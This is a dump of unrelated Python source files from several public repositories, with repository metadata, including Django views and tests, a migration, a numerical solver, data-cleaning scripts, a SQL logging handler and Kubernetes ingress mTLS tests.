/Python/Django/djangoFullStack/DojoReads/DojoReads/readsApp/views.py
|
0d32fd305d3f2b6061eea29e90e9db8069965e0a
|
[] |
no_license
|
sunset375/CodingDojo-1
|
ea025ad90e36bfb6d6ef6bcfaa49e286823299cd
|
c5e483f5009942792c04eb2fa3fea83e5b91b5a2
|
refs/heads/master
| 2023-05-16T10:00:00.060738
| 2020-09-12T04:09:08
| 2020-09-12T04:09:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,772
|
py
|
from django.shortcuts import render, HttpResponse, redirect
from django.contrib import messages
from .models import Book, Author, Review
from loginApp.models import User
# Create your views here.
def index(request):
if 'user_id' not in request.session:
return redirect('/')
else:
user = User.objects.get(id=request.session['user_id'])
context = {
'user': user,
'reviews': reversed(Review.objects.all()),
'all_books': Book.objects.all(),
}
return render(request, 'books.html', context)
# add a book and review
def add(request):
if 'user_id' not in request.session:
return redirect('/')
else:
context = {
'all_authors': Author.objects.all()
}
return render(request, 'create.html', context)
#add books works
def create(request):
if 'user_id' not in request.session:
return redirect('/')
else:
user = User.objects.get(id=request.session['user_id'])
if (len(request.POST['new_author']) > 1):
author = Author.objects.create(name=request.POST['new_author'])
else:
author = Author.objects.filter(name=request.POST['authors_dropdown'])
book = Book.objects.create(
title=request.POST['title'],
author=author)
Review.objects.create(
review=request.POST['review'],
rating=request.POST['rating'],
book=book,
user=user,
)
# book.reviews.add(review)
return redirect('/books')
# view all books with reviews and ratings
def rating(request, bookId):
if 'user_id' not in request.session:
return redirect('/')
context = {
'book': Book.objects.get(id=bookId),
'reviews': Book.objects.get(id=bookId).review.all(),
}
return render(request, 'ratings.html', context)
def postRating(request, bookId):
if 'user_id' not in request.session:
return redirect('/')
else:
user = User.objects.get(id=request.session['user_id'])
book = Book.objects.filter(id=bookId)[0]
Review.objects.create(
review=request.POST['review'],
rating=request.POST['rating'],
book=book,
user=user,
)
return redirect(f'/books/{bookId}')
# end of Ratings Page Actions
def delete(request, bookId, reviewId):
if 'user_id' not in request.session:
return redirect('/')
review = Review.objects.filter(id=reviewId)[0]
if review.user.id != request.session['user_id']:
return redirect(f'/books/{bookId}')
review.delete()
return redirect(f'/books/{bookId}')
def logout(request):
request.session.flush()
return redirect('/')
|
[
"javierjcjr@gmail.com"
] |
javierjcjr@gmail.com
|
9af185bb44b26e788f38c9a1fe411f20f03654cf
|
c00a378d2d001588d805757d61114041dac6c36e
|
/backend/migrations/0006_auto_20151125_0940.py
|
c33545773860c2901866260590b576941a00baf0
|
[] |
no_license
|
millanp/backwatershouse
|
887881d191c64f81c777da21a5da92d546160d14
|
277c1318cf383c091148a0be346e3932c376de26
|
refs/heads/master
| 2021-01-21T15:57:53.924675
| 2019-03-16T00:44:06
| 2019-03-16T00:44:06
| 44,445,440
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,070
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.contrib.postgres.operations import HStoreExtension
from django.contrib.postgres.fields.hstore import HStoreField
class Migration(migrations.Migration):
dependencies = [
('backend', '0005_auto_20151109_0118'),
]
operations = [
HStoreExtension(),
migrations.AddField(
model_name='booking',
name='booking_event_id',
field=HStoreField(null=True, blank=True),
),
migrations.AddField(
model_name='booking',
name='request_event_id',
field=models.TextField(null=True, blank=True),
),
migrations.AlterField(
model_name='room',
name='booking_cal_id',
field=models.TextField(null=True, blank=True),
),
migrations.AlterField(
model_name='room',
name='request_cal_id',
field=models.TextField(null=True, blank=True),
),
]
|
[
"millan.philipose@gmail.com"
] |
millan.philipose@gmail.com
|
587fbbefba3edb82272526c8693e25b0cc930cae
|
4f8d205d805b23643b7932a5edd420b8be703e9f
|
/test/test_fitter.py
|
9e9e788c213b3fdec4a386bfe76f3a99f29b6965
|
[] |
no_license
|
raijinspecial/fitter
|
ec8dd42f1e139c6ea8d794c610506eca1ff38b1c
|
852253047ce94ed61b809e12fc499d7e360190b8
|
refs/heads/master
| 2020-05-04T06:05:18.093777
| 2019-01-27T11:41:22
| 2019-01-27T11:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 909
|
py
|
from fitter import Fitter
def test_fitter():
f = Fitter([1,1,1,2,2,2,2,2,3,3,3,3], distributions=['gamma'], xmin=0, xmax=4)
f.fit()
f.summary()
assert f.xmin == 0
assert f.xmax == 4
# reset the range:
f.xmin = None
f.xmax = None
assert f.xmin == 1
assert f.xmax == 3
f = Fitter([1,1,1,2,2,2,2,2,3,3,3,3], distributions=['gamma'])
f.fit()
f.summary()
assert f.xmin == 1
assert f.xmax == 3
def test_gamma():
from scipy import stats
data = stats.gamma.rvs(2, loc=1.5, scale=2, size=10000)
f = Fitter(data, bins=100)
f.xmin = -10 #should have no effect
f.xmax = 1000000 # no effet
f.xmin=0.1
f.xmax=10
f.distributions = ['gamma', "alpha"]
f.fit()
df = f.summary()
assert len(df)
f.plot_pdf(names=["gamma"])
f.plot_pdf(names="gamma")
res = f.get_best()
assert "gamma" in res.keys()
|
[
"cokelaer@gmail.com"
] |
cokelaer@gmail.com
|
766ceea77cef0b70330acf34547f317c4d09a8a3
|
108235b7b669d99ffc6748fe305dd6841beb6088
|
/PythonModule/geflight/transform/combining_metar.py
|
2ada326ffd051081ca274c18237d27b2d975402f
|
[
"BSD-2-Clause"
] |
permissive
|
noahvanhoucke/GEFlightQuest
|
38a5ea5b6b52d7c350de37b5c87a97512a48a450
|
4d59313df32d9c2cd6d8bddf37b1b0c22512c275
|
refs/heads/master
| 2021-01-18T10:00:01.647533
| 2013-07-24T21:13:51
| 2013-07-24T21:13:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 907
|
py
|
import pandas
import os
folder = os.path.join(os.environ["DataPath"], "GEFlight", "RawFinalEvaluationSet", "Metar", "flightstats_metar")
def combine_metars(base_name):
print base_name
base = pandas.read_csv(folder + base_name + ".csv")
archive = pandas.read_csv(folder + base_name + "archive.csv")
base['metar_reports_id'] = map(lambda x: -x, base['metar_reports_id'])
print archive.columns
if 'metar_reports_id' in archive.columns:
print 'dropping metar_reports_id'
archive = archive.drop(['metar_reports_id'], axis=1)
print "columns:"
print archive.columns
archive = archive.rename(columns = {'metar_reports_archive_id' : 'metar_reports_id'})
combined = base.append(archive, ignore_index = True)
combined.to_csv(folder + base_name + "_combined.csv", index=False)
combine_metars("presentconditions")
combine_metars("reports")
combine_metars("runwaygroups")
combine_metars("skyconditions")
|
[
"ben@benhamner.com"
] |
ben@benhamner.com
|
e9874685fd7aff4ffd78f21e48c8b652f659429b
|
0835f2f9dc2b9076704138ccb92af47e8fad1b98
|
/venv/Scripts/easy_install-script.py
|
1e90971ddd447c23655f546806db10dc2d4cd1d7
|
[] |
no_license
|
eberber/Python-Labs
|
5049b51afcd3ad2b82703974ba23b935d6f337c4
|
78e5b8f2a28d907c993a42dabe57dcf84d07c465
|
refs/heads/master
| 2021-06-08T10:50:29.061152
| 2021-04-08T03:19:59
| 2021-04-08T03:19:59
| 147,609,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
#!C:\Users\eberber97\PycharmProjects\TextTwist\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"e_berber@u.pacific.edu"
] |
e_berber@u.pacific.edu
|
34a4a4e9d06fc2c477650f527a64221e1af2e5d3
|
05e45d98fb3ccfff37c480d47e53f913903b8d29
|
/tests/suite/test_ingress_mtls.py
|
0ae45a8153d24c3ba23f37b8fa379acd00b87b1a
|
[
"Apache-2.0"
] |
permissive
|
gamunu/kubernetes-ingress
|
028e329b763040894352270dd51b280a6519ca66
|
10513a4b4b8e2f36c395b0e304391ea8d96dc960
|
refs/heads/master
| 2023-09-05T17:01:13.635827
| 2021-11-11T03:26:11
| 2021-11-11T03:26:11
| 426,876,243
| 2
| 0
|
Apache-2.0
| 2021-11-11T05:00:47
| 2021-11-11T05:00:47
| null |
UTF-8
|
Python
| false
| false
| 10,188
|
py
|
import mock
import pytest
import requests
from suite.resources_utils import (
wait_before_test,
create_secret_from_yaml,
delete_secret,
)
from suite.ssl_utils import create_sni_session
from suite.vs_vsr_resources_utils import (
read_vs,
read_vsr,
patch_virtual_server_from_yaml,
patch_v_s_route_from_yaml,
)
from suite.policy_resources_utils import (
create_policy_from_yaml,
delete_policy,
)
from settings import TEST_DATA
std_vs_src = f"{TEST_DATA}/virtual-server/standard/virtual-server.yaml"
std_vsr_src = f"{TEST_DATA}/virtual-server-route/route-multiple.yaml"
std_vs_vsr_src = f"{TEST_DATA}/virtual-server-route/standard/virtual-server.yaml"
mtls_sec_valid_src = f"{TEST_DATA}/ingress-mtls/secret/ingress-mtls-secret.yaml"
tls_sec_valid_src = f"{TEST_DATA}/ingress-mtls/secret/tls-secret.yaml"
mtls_pol_valid_src = f"{TEST_DATA}/ingress-mtls/policies/ingress-mtls.yaml"
mtls_pol_invalid_src = f"{TEST_DATA}/ingress-mtls/policies/ingress-mtls-invalid.yaml"
mtls_vs_spec_src = f"{TEST_DATA}/ingress-mtls/spec/virtual-server-mtls.yaml"
mtls_vs_route_src = f"{TEST_DATA}/ingress-mtls/route-subroute/virtual-server-mtls.yaml"
mtls_vsr_subroute_src = f"{TEST_DATA}/ingress-mtls/route-subroute/virtual-server-route-mtls.yaml"
mtls_vs_vsr_src = f"{TEST_DATA}/ingress-mtls/route-subroute/virtual-server-vsr.yaml"
crt = f"{TEST_DATA}/ingress-mtls/client-auth/valid/client-cert.pem"
key = f"{TEST_DATA}/ingress-mtls/client-auth/valid/client-key.pem"
invalid_crt = f"{TEST_DATA}/ingress-mtls/client-auth/invalid/client-cert.pem"
invalid_key = f"{TEST_DATA}/ingress-mtls/client-auth/invalid/client-cert.pem"
def setup_policy(kube_apis, test_namespace, mtls_secret, tls_secret, policy):
print(f"Create ingress-mtls secret")
mtls_secret_name = create_secret_from_yaml(kube_apis.v1, test_namespace, mtls_secret)
print(f"Create ingress-mtls policy")
pol_name = create_policy_from_yaml(kube_apis.custom_objects, policy, test_namespace)
print(f"Create tls secret")
tls_secret_name = create_secret_from_yaml(kube_apis.v1, test_namespace, tls_secret)
return mtls_secret_name, tls_secret_name, pol_name
def teardown_policy(kube_apis, test_namespace, tls_secret, pol_name, mtls_secret):
print("Delete policy and related secrets")
delete_secret(kube_apis.v1, tls_secret, test_namespace)
delete_policy(kube_apis.custom_objects, pol_name, test_namespace)
delete_secret(kube_apis.v1, mtls_secret, test_namespace)
@pytest.mark.policies
@pytest.mark.parametrize(
"crd_ingress_controller, virtual_server_setup",
[
(
{
"type": "complete",
"extra_args": [
f"-enable-leader-election=false",
f"-enable-preview-policies",
],
},
{
"example": "virtual-server",
"app_type": "simple",
},
)
],
indirect=True,
)
class TestIngressMtlsPolicyVS:
@pytest.mark.parametrize(
"policy_src, vs_src, expected_code, expected_text, vs_message, vs_state",
[
(
mtls_pol_valid_src,
mtls_vs_spec_src,
200,
"Server address:",
"was added or updated",
"Valid",
),
(
mtls_pol_valid_src,
mtls_vs_route_src,
500,
"Internal Server Error",
"is not allowed in the route context",
"Warning",
),
(
mtls_pol_invalid_src,
mtls_vs_spec_src,
500,
"Internal Server Error",
"is missing or invalid",
"Warning",
),
],
)
@pytest.mark.smoke
def test_ingress_mtls_policy(
self,
kube_apis,
crd_ingress_controller,
virtual_server_setup,
test_namespace,
policy_src,
vs_src,
expected_code,
expected_text,
vs_message,
vs_state,
):
"""
Test ingress-mtls with valid and invalid policy in vs spec and route contexts.
"""
session = create_sni_session()
mtls_secret, tls_secret, pol_name = setup_policy(
kube_apis,
test_namespace,
mtls_sec_valid_src,
tls_sec_valid_src,
policy_src,
)
print(f"Patch vs with policy: {policy_src}")
patch_virtual_server_from_yaml(
kube_apis.custom_objects,
virtual_server_setup.vs_name,
vs_src,
virtual_server_setup.namespace,
)
wait_before_test()
resp = session.get(
virtual_server_setup.backend_1_url_ssl,
cert=(crt, key),
headers={"host": virtual_server_setup.vs_host},
allow_redirects=False,
verify=False,
)
vs_res = read_vs(kube_apis.custom_objects, test_namespace, virtual_server_setup.vs_name)
teardown_policy(kube_apis, test_namespace, tls_secret, pol_name, mtls_secret)
patch_virtual_server_from_yaml(
kube_apis.custom_objects,
virtual_server_setup.vs_name,
std_vs_src,
virtual_server_setup.namespace,
)
assert (
resp.status_code == expected_code
and expected_text in resp.text
and vs_message in vs_res["status"]["message"]
and vs_res["status"]["state"] == vs_state
)
@pytest.mark.parametrize(
"certificate, expected_code, expected_text, exception",
[
((crt, key), 200, "Server address:", ""),
("", 400, "No required SSL certificate was sent", ""),
((invalid_crt, invalid_key), "None", "None", "Caused by SSLError"),
],
)
def test_ingress_mtls_policy_cert(
self,
kube_apis,
crd_ingress_controller,
virtual_server_setup,
test_namespace,
certificate,
expected_code,
expected_text,
exception,
):
"""
Test ingress-mtls with valid and invalid policy
"""
session = create_sni_session()
mtls_secret, tls_secret, pol_name = setup_policy(
kube_apis,
test_namespace,
mtls_sec_valid_src,
tls_sec_valid_src,
mtls_pol_valid_src,
)
print(f"Patch vs with policy: {mtls_pol_valid_src}")
patch_virtual_server_from_yaml(
kube_apis.custom_objects,
virtual_server_setup.vs_name,
mtls_vs_spec_src,
virtual_server_setup.namespace,
)
wait_before_test()
ssl_exception = ""
resp = ""
try:
resp = session.get(
virtual_server_setup.backend_1_url_ssl,
cert=certificate,
headers={"host": virtual_server_setup.vs_host},
allow_redirects=False,
verify=False,
)
except requests.exceptions.SSLError as e:
print(f"SSL certificate exception: {e}")
ssl_exception = str(e)
resp = mock.Mock()
resp.status_code = "None"
resp.text = "None"
teardown_policy(kube_apis, test_namespace, tls_secret, pol_name, mtls_secret)
patch_virtual_server_from_yaml(
kube_apis.custom_objects,
virtual_server_setup.vs_name,
std_vs_src,
virtual_server_setup.namespace,
)
assert (
resp.status_code == expected_code
and expected_text in resp.text
and exception in ssl_exception
)
@pytest.mark.policies
@pytest.mark.parametrize(
"crd_ingress_controller, v_s_route_setup",
[
(
{
"type": "complete",
"extra_args": [
f"-enable-leader-election=false",
f"-enable-preview-policies",
],
},
{"example": "virtual-server-route"},
)
],
indirect=True,
)
class TestIngressMtlsPolicyVSR:
def test_ingress_mtls_policy_vsr(
self,
kube_apis,
crd_ingress_controller,
v_s_route_app_setup,
v_s_route_setup,
test_namespace,
):
"""
Test ingress-mtls in vsr subroute context.
"""
mtls_secret, tls_secret, pol_name = setup_policy(
kube_apis,
v_s_route_setup.route_m.namespace,
mtls_sec_valid_src,
tls_sec_valid_src,
mtls_pol_valid_src,
)
print(
f"Patch vsr with policy: {mtls_vsr_subroute_src} and vs with tls secret: {tls_secret}"
)
patch_virtual_server_from_yaml(
kube_apis.custom_objects,
v_s_route_setup.vs_name,
mtls_vs_vsr_src,
v_s_route_setup.namespace,
)
patch_v_s_route_from_yaml(
kube_apis.custom_objects,
v_s_route_setup.route_m.name,
mtls_vsr_subroute_src,
v_s_route_setup.route_m.namespace,
)
wait_before_test()
vsr_res = read_vsr(
kube_apis.custom_objects,
v_s_route_setup.route_m.namespace,
v_s_route_setup.route_m.name,
)
teardown_policy(
kube_apis, v_s_route_setup.route_m.namespace, tls_secret, pol_name, mtls_secret
)
patch_v_s_route_from_yaml(
kube_apis.custom_objects,
v_s_route_setup.route_m.name,
std_vsr_src,
v_s_route_setup.route_m.namespace,
)
patch_virtual_server_from_yaml(
kube_apis.custom_objects,
v_s_route_setup.vs_name,
std_vs_vsr_src,
v_s_route_setup.namespace,
)
assert (
vsr_res["status"]["state"] == "Warning"
and f"{pol_name} is not allowed in the subroute context" in vsr_res["status"]["message"]
)
|
[
"noreply@github.com"
] |
gamunu.noreply@github.com
|
5c32aa116045d822f41e3135a9671d6eead08b0b
|
e96cf20ccf9a288ab9516f748c17948a96d46048
|
/GaussJacobi.py
|
a69c56c5797aa55b3324af7f43570d6ecdd407b6
|
[
"MIT"
] |
permissive
|
dcalds/MetodosNumericos
|
7e4ee31f6618d156ad158485d5246510ad9daf67
|
8fd9161119a5bb6aaf393c39d301f6063cbeaa54
|
refs/heads/master
| 2020-04-17T15:51:55.389109
| 2019-02-11T14:14:06
| 2019-02-11T14:14:06
| 166,716,632
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 988
|
py
|
# Algoritimo 08 - Gauss Jacobi
def showMatrix(M):
for i in M:
print(i, sep=' ')
print()
def gaussJ(A, b):
xo = [0,0,0] # Chutes
N = 500 # Limitador de Iterações
e = 0.001 # Erro
n = len(A)
k = 1
x = [0 for i in range(n)]
while k <= N:
for i in range(n):
soma = 0
for j in range(n):
if j != i:
soma += A[i][j] * xo[j]
x[i] = (b[i] - soma) / A[i][i]
X = []
for a in range(n):
X.append(abs(x[a]-xo[a]))
if max(X) < e:
return x
k+=1
for i in range(n):
xo[i] = x[i]
return ("Rodou, rodou e não chegou em lugar nenhum.")
A = [[10,2,1],[1,5,1],[2,3,10]]
b = [7,-8,6]
print("# Matriz A: ")
showMatrix(A)
print("# Vetor b: ")
print(b)
print()
print("# Matriz de Coeficientes xi's: ")
print(gaussJ(A,b))
|
[
"noreply@github.com"
] |
dcalds.noreply@github.com
|
36470e136c44f6cf01b439a2f5659da400da4274
|
8b6edb9665bf90fe93d224fd2903e879d6f92f1d
|
/set_transfer/check_na.py
|
7cef8b64c7a50543db03d289a36fec38231fdfb5
|
[] |
no_license
|
Mandyli1996/Multi-modal-learning-for-Neural-Record-Linkage
|
808836f8b9f059e7fcf01db0a202bb100f27a806
|
d6ada3bbc226adfa5ef5cfaae9b648e9b426921a
|
refs/heads/master
| 2022-01-31T12:18:05.429898
| 2019-08-16T01:43:46
| 2019-08-16T01:43:46
| 197,054,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 569
|
py
|
import pandas as pd
import numpy as np
ls = ['train_1', 'train_2', 'test_1', 'test_2', 'val_1', 'val_2']
def fillna_price(ls):
for item in ls:
original = pd.read_csv(item+'.csv')
original['price']=original['price'].fillna(original['price'].mean())
original.to_csv(item+'.csv')
fillna_price(ls)
test_1 = pd.read_csv('test_1.csv')
print(test_1['price'].isna().sum())
#print(original['title_clean'].isna().sum() , 'title')
#print(original['price'].isna().sum() , 'price')
#print(original['lon'].isna().sum(), 'lon')
#print(original[''])
|
[
"noreply@github.com"
] |
Mandyli1996.noreply@github.com
|
ff3cada1d4caaf3448a84be2cf4ae3e62ab27d75
|
b2c38070db99d8245e3d62b4591188744c793363
|
/tests/Actors/test_mcts_player.py
|
98047991aafb840ce2c56aee7ae008fbe2be64a7
|
[] |
no_license
|
drieswijns/ahorn
|
0bd03579b44ed0d65959ddbe9b2358f11b7d590a
|
8d18f538fcf111c91fcf3287d4c5daf1b4b2e58d
|
refs/heads/master
| 2021-01-17T17:33:13.994289
| 2016-08-02T15:08:21
| 2016-08-02T15:08:21
| 64,645,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 766
|
py
|
from ahorn.TicTacToe.States import TicTacToeState
from ahorn.Actors import RandomPlayer, MCTSPlayer
from ahorn import Controller
players = [RandomPlayer(), MCTSPlayer(simulation_count=100)]
def test_mcts_player():
average_utility = [0, 0]
N = 10
for _ in range(N):
state = TicTacToeState(players)
controller = Controller(state, verbose=True)
end_state = controller.play()
end_utility = [end_state.get_utility(p) for p in players]
average_utility = [
old + new
for old, new
in zip(average_utility, end_utility)
]
average_utility = [j/N for j in average_utility]
# MCTSPlayer should be better than RandomPlayer
assert(average_utility[1] > average_utility[0])
|
[
"dries.wijns@gmail.com"
] |
dries.wijns@gmail.com
|
23f626cdf5f7a42a05e907d826ffbcf6ec8ab41c
|
e04dbc32247accf073e3089ed4013427ad182c7c
|
/ABC157/ABC157B.py
|
b62e75dac44f15b4639aa942fe1d9ec1945b4fc4
|
[] |
no_license
|
twobooks/atcoder_training
|
9deb237aed7d9de573c1134a858e96243fb73ca0
|
aa81799ec87cc9c9d76de85c55e99ad5fa7676b5
|
refs/heads/master
| 2021-10-28T06:33:19.459975
| 2021-10-20T14:16:57
| 2021-10-20T14:16:57
| 233,233,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,085
|
py
|
# import math
# from itertools import permutations as permus
# from fractions import gcd
# import numpy as np
# import scipy as scp
times = 3
cardnums = []
for _ in range(times):
cardnums = cardnums + list(map(int,input().split())) # S += [input()] とも書ける
n = int(input())
times = n
bingonums = []
for _ in range(times):
bingonums = bingonums + list(map(int,input().split())) # S += [input()] とも書ける
for bingonum in bingonums:
cardnums = [101 if cardnum == bingonum else cardnum for cardnum in cardnums]
def bingo_check(lis:list) -> str:
if sum(lis[0:3])==303:
return "Yes"
if sum(lis[3:6])==303:
return "Yes"
if sum(lis[6:9])==303:
return "Yes"
if sum([lis[0],lis[3],lis[6]])==303:
return "Yes"
if sum([lis[1],lis[4],lis[7]])==303:
return "Yes"
if sum([lis[2],lis[5],lis[8]])==303:
return "Yes"
if sum([lis[0],lis[4],lis[8]])==303:
return "Yes"
if sum([lis[2],lis[4],lis[6]])==303:
return "Yes"
return "No"
ans = bingo_check(cardnums)
print(ans)
|
[
"twobookscom@gmail.com"
] |
twobookscom@gmail.com
|
ec6c6936ebe54a339c4eeebe4ac4a9ac01f46bed
|
7ca9127408edf2ad90b4dcaebf0e67cf540990c4
|
/SQLLoggingHandler.py
|
f14dcc5817f88e294ae159b7af6ce1ecadca26be
|
[] |
no_license
|
aknimbal/ccbcu_aks_poc-master
|
34c44203ca227c32667f7cc6a818dfdc7aa503d9
|
2697185bfc1d9cd252b212098add8f99b0c245c0
|
refs/heads/master
| 2020-05-14T19:23:52.095601
| 2019-04-17T17:05:30
| 2019-04-17T17:05:30
| 181,928,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,663
|
py
|
import pypyodbc
import logging
import time
__version__ = "0.1.0"
initial_sql = """IF NOT EXISTS (SELECT * FROM sys.tables
WHERE name = N'Log' AND type = 'U')
CREATE TABLE Log(
[id] [int] IDENTITY(1,1) NOT NULL,
TimeStamp datetimeoffset(7),
Source TEXT,
LogLevel INT,
LogLevelName varchar(50),
Message TEXT,
Args TEXT,
Module TEXT,
FuncName TEXT,
[LineNo] INT,
Exception TEXT,
Process INT,
Thread TEXT,
ThreadName TEXT
)"""
insertion_sql = """INSERT INTO Log(
TimeStamp,
Source,
LogLevel,
LogLevelName,
Message,
Args,
Module,
FuncName,
[LineNo],
Exception,
Process,
Thread,
ThreadName
)
VALUES (
'%(dbtime)s',
'%(name)s',
%(levelno)d,
'%(levelname)s',
'%(msg)s',
'%(args)s',
'%(module)s',
'%(funcName)s',
%(lineno)d,
'%(exc_text)s',
%(process)d,
'%(thread)s',
'%(threadName)s'
);
"""
class SQLHandler(logging.Handler):
def __init__(self, host, port, user, passwd, database):
logging.Handler.__init__(self)
print("init SQLHandler")
self.host= host
self.port= port
self.user= user
self.passwd= passwd
self.database= database
connection_string ='Driver={{SQL Server Native Client 11.0}};Server={0};Database={1};Uid={2};Pwd={3};'.format(host, database, user, passwd)
self.conn = pypyodbc.connect(connection_string, autocommit=True)
cursor = self.conn.cursor()
cursor.execute(initial_sql)
cursor.close()
print("init end SQLHandler")
def format_time(self, record):
"""
Create a time stamp
"""
record.dbtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(record.created))
def format_msg(self, record):
record.msg = record.msg.replace("\'", "''")
record.msg = record.msg.replace(" ' ", " '' ")
record.msg = record.msg.replace("'", "''")
record.msg = record.msg.strip("'")
def format_exc_text(self, record):
if record.exc_text:
record.exc_text = record.exc_text.replace("\'", "''")
record.exc_text = record.exc_text.replace(" ' ", " '' ")
record.exc_text = record.exc_text.replace("'", "''")
record.exc_text = record.exc_text.strip("'")
def emit(self, record):
#print("start emit")
self.format(record)
self.format_time(record)
self.format_msg(record)
if record.exc_info: # for exceptions
record.exc_text = logging._defaultFormatter.formatException(record.exc_info)
else:
record.exc_text = ""
self.format_exc_text(record)
# Insert the log record
sql = insertion_sql % record.__dict__
cursor = self.conn.cursor()
#print(f'sql: {sql}')
cursor.execute(sql)
cursor.close()
#print("end emit")
|
[
"noreply@github.com"
] |
aknimbal.noreply@github.com
|
fae6e4839e223b43e36d210ac4aa03db2a555bd9
|
4d2ab3c8feb5a78ed3e453722b3e4fb3733ee254
|
/fourthproj/fourthproj/urls.py
|
2b021ea656c9e8e8de7757117ee0b33fe450c409
|
[] |
no_license
|
aeuna/likelion_homework
|
88325337e6029f96bb92f822fce2e1e6e675ff11
|
3728d5074ca887bda546d9eb9dabd6fb30367b70
|
refs/heads/master
| 2022-12-17T17:41:06.559623
| 2020-09-18T15:48:33
| 2020-09-18T15:48:33
| 264,348,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
"""fourthproj URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import homework.views
urlpatterns = [
path('admin/', admin.site.urls),
path('',homework.views.idea, name='idea')
]
|
[
"4294psy@naver.com"
] |
4294psy@naver.com
|
3891a408d1e89295ce8caa8807429df5ffb5a87e
|
39ba51b384a509585d703545b7a55a99280da84f
|
/0x0F-python-object_relational_mapping/13-model_state_delete_a.py
|
a30482c34119264fc6855ea507cbe64d2c1c5f2e
|
[] |
no_license
|
lepc1972/holbertonschool-higher_level_programming
|
5145700bcfbc3fc561cb999a3f7824c49214eeee
|
116017b0c652c381f056ae789eb22b656b9201df
|
refs/heads/master
| 2023-08-29T00:32:13.794293
| 2021-09-27T23:35:04
| 2021-09-27T23:35:04
| 361,802,877
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
#!/usr/bin/python3
'''delete states that contains letter a'''
from sys import argv
from model_state import Base, State
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
if __name__ == '__main__':
eng = create_engine(
'mysql+mysqldb://{}:{}@localhost/{}'
.format(argv[1], argv[2], argv[3]), pool_pre_ping=True)
Base.metadata.create_all(eng)
ses = sessionmaker(bind=eng)()
ses.query(State).filter(State.name.like('%a%')).\
delete(synchronize_session=False)
ses.commit()
ses.close()
|
[
"githublepc@gmail.com"
] |
githublepc@gmail.com
|
9b91d6a99d9a8eb90a69f3a029470c191d888eb5
|
fb073e9b08d6318035d3d3350c5406270758ae5a
|
/mission_api/tests.py
|
77b1b785cd6899aa938aead899708525095a7265
|
[
"MIT"
] |
permissive
|
JustinWingChungHui/OITS_UI
|
d6bff2c8ecc67e9029d1a4eac9517a5f9b070282
|
3456f1938d0cabd4476e7e986f374cf550ab9ccd
|
refs/heads/master
| 2023-08-07T21:28:37.347066
| 2021-02-15T19:33:19
| 2021-02-15T19:33:19
| 254,941,147
| 0
| 1
|
MIT
| 2021-09-22T18:52:00
| 2020-04-11T19:35:15
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,858
|
py
|
from django.test import TestCase, Client
from rest_framework.test import APIClient
from oits_params.models import OitsParams
from oits_params.default_data import esa_mission
import json
class ViewsTestCase(TestCase):
def setUp(self):
self.params = OitsParams.objects.create(parameters='{test: "test"}', description='mydesc')
def test_mission_api_list(self):
model = OitsParams()
model.description = 'description'
model.parameters = esa_mission
model.save()
client = APIClient()
response = client.get('/api/mission/', format='json')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertTrue(len(data) > 0)
def test_mission_api_create_validation_error(self):
client = APIClient()
data = json.loads(esa_mission)
data['description'] = 'test data'
data['Nbody'] = 4
response = client.post('/api/mission/', data, format='json')
self.assertEqual(response.status_code, 400)
data = json.loads(response.content)
def test_mission_api_create(self):
client = APIClient()
data = json.loads(esa_mission)
data['description'] = 'test data'
response = client.post('/api/mission/', data, format='json')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
new_model = OitsParams.objects.get(pk=data['id'])
self.assertIsNotNone(new_model)
def test_mission_api_retrieve(self):
model = OitsParams()
model.description = 'description'
model.parameters = esa_mission
model.save()
client = APIClient()
url = '/api/mission/{0}/'.format(model.id)
response = client.get(url, format='json')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(model.id, data['id'])
def test_mission_api_delete(self):
model = OitsParams()
model.description = 'description'
model.parameters = esa_mission
model.save()
client = APIClient()
response = client.delete('/api/mission/{0}/'.format(model.id), format='json')
self.assertEqual(response.status_code, 200)
count = OitsParams.objects.filter(id=model.id).count()
self.assertEqual(0, count)
def test_mission_api_delete_readonly(self):
model = OitsParams()
model.description = 'description'
model.parameters = esa_mission
model.readonly = True
model.save()
client = APIClient()
response = client.delete('/api/mission/{0}/'.format(model.id), format='json')
self.assertEqual(response.status_code, 400)
count = OitsParams.objects.filter(id=model.id).count()
self.assertEqual(1, count)
def test_mission_api_cancel_mission_readonly(self):
model = OitsParams()
model.description = 'description'
model.parameters = esa_mission
model.status = 'N'
model.readonly = True
model.save()
client = Client()
response = client.post('/api/mission/{0}/cancel/'.format(model.id), format='json')
self.assertEqual(response.status_code, 400)
